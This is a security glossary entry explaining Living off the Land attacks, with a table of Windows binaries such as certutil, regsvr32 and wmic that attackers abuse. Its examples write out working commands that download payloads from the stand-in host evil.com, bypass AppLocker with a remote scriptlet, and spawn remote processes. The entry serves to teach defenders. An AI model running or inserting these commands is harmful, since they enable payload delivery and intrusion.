living-off-the-land-lolbins

Tactics & Techniques

Definition

Living off the Land (LotL) refers to an attack approach where adversaries use tools and binaries already present on the target system rather than dropping their own malware. The binaries abused this way are called LOLBins or Legitimate Operating System Binaries.

The logic is simple: if you use what's already there, you blend in. No custom malware to detect, no unknown binary to flag, no signature to write a rule against. The attack looks like normal system administration activity because it largely is just pointed in the wrong direction.

The attacker's entire toolkit might be `certutil.exe`, `powershell.exe`, and `wmic.exe`, all signed by Microsoft, all expected to run on any Windows machine.

### Common LOLBins and What Attackers Do With Them

| Binary | Legitimate Purpose | How Attackers Abuse It |
|---|---|---|
| `certutil.exe` | Certificate management | Download files, decode base64 payloads |
| `powershell.exe` | Scripting and automation | Execute encoded commands, download stagers, run in-memory payloads |
| `wmic.exe` | WMI management | Remote execution, process creation, persistence |
| `mshta.exe` | Run HTA applications | Execute malicious scripts hosted remotely |
| `rundll32.exe` | Run DLL files | Load and execute malicious DLLs |
| `regsvr32.exe` | Register COM objects | Execute remote scriptlets, bypass AppLocker |
| `msiexec.exe` | Install MSI packages | Download and execute remote MSI payloads |
| `bitsadmin.exe` | Background transfer jobs | Download malicious files, establish persistence |
| `cmd.exe` | Command line interpreter | Chain commands, run scripts, enumerate the environment |
| `schtasks.exe` | Manage scheduled tasks | Create persistence, trigger payload execution |

This is not a complete list. The [LOLBAS Project](https://lolbas-project.github.io/) maintains a full catalog of documented binaries, scripts, and libraries with known abuse cases.

Explore More Terms

Examples & Use Cases

**Certutil file download** — An attacker uses `certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\Temp\payload.exe` to pull a second-stage implant. No custom downloader needed. A signed Windows binary
did the job.

**Encoded PowerShell stager** — A phishing macro executes a base64-encoded PowerShell command that downloads and runs a Cobalt Strike beacon entirely in memory. Nothing written to disk, no unsigned binary, no AV alert.

**Regsvr32 AppLocker bypass** — An attacker uses `regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll` to execute a remote scriptlet and bypass application whitelisting controls. A documented technique since 2016. Still works in many environments today.

**WMIC lateral movement** — An attacker uses `wmic.exe` to remotely create a process on
another host in the network: `wmic /node:192.168.1.50 process call create "cmd.exe /c whoami"` No PSExec, no custom tool. Built-in Windows management utility used as a pivot mechanism.

**APT41 and FIN7** — Both groups have been extensively documented using LOLBin techniques including PowerShell, MSHTA, and Rundll32 as primary execution methods across multiple campaigns, deliberately avoiding custom malware to reduce detection surface.

### Further Reading

- [LOLBAS Project — Full Binary Catalog](https://lolbas-project.github.io/)
- [MITRE ATT&CK — T1218 System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218/)
- [SANS — Detecting LOLBins](https://www.sans.org/blog/defense-spotlight-finding-evil-in-windows-10-prefetch-files/)
- [Red Canary — LOLBins Threat Report](https://redcanary.com/threat-detection-report/techniques/windows-command-shell/)